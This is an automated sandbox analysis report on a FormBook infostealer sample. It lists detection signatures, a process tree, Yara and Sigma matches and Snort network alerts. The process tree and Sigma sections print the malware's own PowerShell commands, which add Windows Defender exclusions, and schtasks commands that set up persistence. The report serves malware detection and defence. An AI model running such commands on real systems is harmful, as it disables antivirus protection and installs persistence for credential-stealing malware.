Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Inquiry PR#27957.bat.exe

Overview

General Information

Sample name:Inquiry PR#27957.bat.exe
Analysis ID:1470000
MD5:9972524538c9f43a23ad683da0a1a97a
SHA1:4fe56974a8a9db66fb9026b0c817a84111cb834b
SHA256:499ef83eee9cef5efa3dfc22fc88a6962289722a65626ec1630721e930784287
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Inquiry PR#27957.bat.exe (PID: 5748 cmdline: "C:\Users\user\Desktop\Inquiry PR#27957.bat.exe" MD5: 9972524538C9F43A23AD683DA0A1A97A)
    • powershell.exe (PID: 7224 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Inquiry PR#27957.bat.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7280 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\fuqwoDzun.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7608 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7316 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fuqwoDzun" /XML "C:\Users\user\AppData\Local\Temp\tmp2C94.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7488 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • TsdBVAGjsKVoi.exe (PID: 6336 cmdline: "C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • sfc.exe (PID: 7916 cmdline: "C:\Windows\SysWOW64\sfc.exe" MD5: 4D2662964EF299131D049EC1278BE08B)
          • TsdBVAGjsKVoi.exe (PID: 5488 cmdline: "C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7228 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • fuqwoDzun.exe (PID: 7596 cmdline: C:\Users\user\AppData\Roaming\fuqwoDzun.exe MD5: 9972524538C9F43A23AD683DA0A1A97A)
    • schtasks.exe (PID: 7732 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fuqwoDzun" /XML "C:\Users\user\AppData\Local\Temp\tmp40A9.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7776 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • TsdBVAGjsKVoi.exe (PID: 6564 cmdline: "C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • sfc.exe (PID: 8088 cmdline: "C:\Windows\SysWOW64\sfc.exe" MD5: 4D2662964EF299131D049EC1278BE08B)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.1645996592.00000000015A0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000009.00000002.1645996592.00000000015A0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2b6b0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x141ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000009.00000002.1645343377.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000009.00000002.1645343377.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2eaa3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x175f2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000011.00000002.3788281912.0000000002F50000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 19 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        9.2.RegSvcs.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          9.2.RegSvcs.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2dca3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x167f2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          9.2.RegSvcs.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            9.2.RegSvcs.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2eaa3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x175f2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Inquiry PR#27957.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Inquiry PR#27957.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Inquiry PR#27957.bat.exe", ParentImage: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe, ParentProcessId: 5748, ParentProcessName: Inquiry PR#27957.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Inquiry PR#27957.bat.exe", ProcessId: 7224, ProcessName: powershell.exe
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Inquiry PR#27957.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Inquiry PR#27957.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Inquiry PR#27957.bat.exe", ParentImage: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe, ParentProcessId: 5748, ParentProcessName: Inquiry PR#27957.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Inquiry PR#27957.bat.exe", ProcessId: 7224, ProcessName: powershell.exe
            Sigma detected: Suspicious Add Scheduled Task Parent
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fuqwoDzun" /XML "C:\Users\user\AppData\Local\Temp\tmp40A9.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fuqwoDzun" /XML "C:\Users\user\AppData\Local\Temp\tmp40A9.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\fuqwoDzun.exe, ParentImage: C:\Users\user\AppData\Roaming\fuqwoDzun.exe, ParentProcessId: 7596, ParentProcessName: fuqwoDzun.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fuqwoDzun" /XML "C:\Users\user\AppData\Local\Temp\tmp40A9.tmp", ProcessId: 7732, ProcessName: schtasks.exe
            Sigma detected: Suspicious Schtasks From Env Var Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fuqwoDzun" /XML "C:\Users\user\AppData\Local\Temp\tmp2C94.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fuqwoDzun" /XML "C:\Users\user\AppData\Local\Temp\tmp2C94.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Inquiry PR#27957.bat.exe", ParentImage: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe, ParentProcessId: 5748, ParentProcessName: Inquiry PR#27957.bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fuqwoDzun" /XML "C:\Users\user\AppData\Local\Temp\tmp2C94.tmp", ProcessId: 7316, ProcessName: schtasks.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Inquiry PR#27957.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Inquiry PR#27957.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Inquiry PR#27957.bat.exe", ParentImage: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe, ParentProcessId: 5748, ParentProcessName: Inquiry PR#27957.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Inquiry PR#27957.bat.exe", ProcessId: 7224, ProcessName: powershell.exe

            Persistence and Installation Behavior

            barindex
            Sigma detected: Scheduled temp file as task from temp location
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fuqwoDzun" /XML "C:\Users\user\AppData\Local\Temp\tmp2C94.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fuqwoDzun" /XML "C:\Users\user\AppData\Local\Temp\tmp2C94.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Inquiry PR#27957.bat.exe", ParentImage: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe, ParentProcessId: 5748, ParentProcessName: Inquiry PR#27957.bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fuqwoDzun" /XML "C:\Users\user\AppData\Local\Temp\tmp2C94.tmp", ProcessId: 7316, ProcessName: schtasks.exe

            Snort Signatures

            Timestamp:07/09/24-12:11:31.166546
            SID:2855465
            Source Port:49767
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/09/24-12:09:32.817975
            SID:2855464
            Source Port:49733
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/09/24-12:08:47.740793
            SID:2855464
            Source Port:49720
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/09/24-12:10:48.702397
            SID:2855465
            Source Port:49755
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/09/24-12:11:16.679042
            SID:2855465
            Source Port:49763
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/09/24-12:09:47.673365
            SID:2855464
            Source Port:49737
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/09/24-12:10:21.548355
            SID:2855465
            Source Port:49747
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/09/24-12:10:40.838976
            SID:2855464
            Source Port:49752
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/09/24-12:08:35.398619
            SID:2855464
            Source Port:49717
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/09/24-12:10:07.968762
            SID:2855465
            Source Port:49743
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/09/24-12:10:13.803996
            SID:2855464
            Source Port:49744
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/09/24-12:10:27.367616
            SID:2855464
            Source Port:49748
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/09/24-12:08:55.539602
            SID:2855465
            Source Port:49723
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/09/24-12:11:23.430709
            SID:2855464
            Source Port:49764
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/09/24-12:10:00.222302
            SID:2855464
            Source Port:49740
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/09/24-12:11:11.535008
            SID:2855464
            Source Port:49761
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/09/24-12:10:35.094051
            SID:2855465
            Source Port:49751
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/09/24-12:11:45.068161
            SID:2855465
            Source Port:49771
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/09/24-12:08:50.338513
            SID:2855464
            Source Port:49721
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/09/24-12:10:16.382255
            SID:2855464
            Source Port:49745
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/09/24-12:08:40.543474
            SID:2855465
            Source Port:49719
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/09/24-12:09:24.363900
            SID:2855465
            Source Port:49731
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/09/24-12:10:43.430684
            SID:2855464
            Source Port:49753
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/09/24-12:09:05.318239
            SID:2855464
            Source Port:49725
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/09/24-12:09:30.239032
            SID:2855464
            Source Port:49732
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/09/24-12:09:16.606161
            SID:2855464
            Source Port:49728
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/09/24-12:09:38.004077
            SID:2855465
            Source Port:49735
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/09/24-12:10:02.804055
            SID:2855464
            Source Port:49741
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/09/24-12:10:54.515112
            SID:2855464
            Source Port:49756
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/09/24-12:11:37.104571
            SID:2855464
            Source Port:49768
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/09/24-12:09:19.190131
            SID:2855464
            Source Port:49729
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/09/24-12:11:02.820585
            SID:2855465
            Source Port:49759
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/09/24-12:11:39.911847
            SID:2855464
            Source Port:49769
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/09/24-12:09:10.495852
            SID:2855465
            Source Port:49727
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/09/24-12:11:08.956190
            SID:2855464
            Source Port:49760
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/09/24-12:11:25.996162
            SID:2855464
            Source Port:49765
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/09/24-12:09:52.842522
            SID:2855465
            Source Port:49739
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/09/24-12:09:45.087320
            SID:2855464
            Source Port:49736
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/09/24-12:10:29.937727
            SID:2855464
            Source Port:49749
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/09/24-12:10:57.095264
            SID:2855464
            Source Port:49757
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/09/24-12:08:11.644897
            SID:2855465
            Source Port:49715
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/09/24-12:08:32.822233
            SID:2855464
            Source Port:49716
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/09/24-12:09:02.725888
            SID:2855464
            Source Port:49724
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeReversingLabs: Detection: 34%
            Multi AV Scanner detection for submitted file
            Source: Inquiry PR#27957.bat.exeReversingLabs: Detection: 34%
            Yara detected FormBook
            Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000009.00000002.1645996592.00000000015A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1645343377.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.3788281912.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.3788326451.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.3791731697.00000000050A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.3785830120.0000000000A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.1956019902.0000000000C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1647315768.0000000002340000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.3788370711.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.1858896914.0000000003320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: Inquiry PR#27957.bat.exeJoe Sandbox ML: detected
            Source: Inquiry PR#27957.bat.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: Inquiry PR#27957.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: TsdBVAGjsKVoi.exe, 00000010.00000002.3785830920.00000000005CE000.00000002.00000001.01000000.0000000E.sdmp, TsdBVAGjsKVoi.exe, 00000012.00000000.1710209897.00000000005CE000.00000002.00000001.01000000.0000000E.sdmp, TsdBVAGjsKVoi.exe, 00000015.00000002.3785833047.00000000005CE000.00000002.00000001.01000000.0000000E.sdmp
            Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000011.00000002.3788787440.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000011.00000003.1646138502.0000000002E57000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000011.00000003.1654535564.000000000300D000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000011.00000002.3788787440.000000000335E000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000013.00000002.1956648404.00000000035B0000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000013.00000003.1856891406.000000000325A000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000013.00000003.1864671639.0000000003400000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000013.00000002.1956648404.000000000374E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000011.00000002.3788787440.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000011.00000003.1646138502.0000000002E57000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000011.00000003.1654535564.000000000300D000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000011.00000002.3788787440.000000000335E000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000013.00000002.1956648404.00000000035B0000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000013.00000003.1856891406.000000000325A000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000013.00000003.1864671639.0000000003400000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000013.00000002.1956648404.000000000374E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: sfc.pdb source: RegSvcs.exe, 00000009.00000002.1645624396.0000000001198000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.1856939303.0000000000E17000.00000004.00000020.00020000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000010.00000003.1875454524.000000000164B000.00000004.00000020.00020000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000012.00000002.3787189728.00000000008B7000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: sfc.pdbGCTL source: RegSvcs.exe, 00000009.00000002.1645624396.0000000001198000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.1856939303.0000000000E17000.00000004.00000020.00020000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000010.00000003.1875454524.000000000164B000.00000004.00000020.00020000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000012.00000002.3787189728.00000000008B7000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeCode function: 4x nop then jmp 073490EEh0_2_07348729
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeCode function: 4x nop then jmp 073490EEh0_2_073486A0
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeCode function: 4x nop then jmp 073490EEh0_2_0734875D
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeCode function: 4x nop then jmp 073490EEh0_2_07348C51
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeCode function: 4x nop then jmp 073490EEh0_2_07348A73
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeCode function: 4x nop then jmp 073490EEh0_2_07348906
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeCode function: 4x nop then jmp 073490EEh0_2_0734884E
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeCode function: 4x nop then jmp 069182DEh10_2_06917890
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeCode function: 4x nop then jmp 069182DEh10_2_06917919
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeCode function: 4x nop then jmp 069182DEh10_2_06917E41
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeCode function: 4x nop then jmp 069182DEh10_2_06917C67
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeCode function: 4x nop then jmp 069182DEh10_2_06917AF6
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeCode function: 4x nop then jmp 069182DEh10_2_06917A3E
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeCode function: 4x nop then jmp 069182DEh10_2_0691794D

            Networking

            barindex
            Snort IDS alert for network traffic
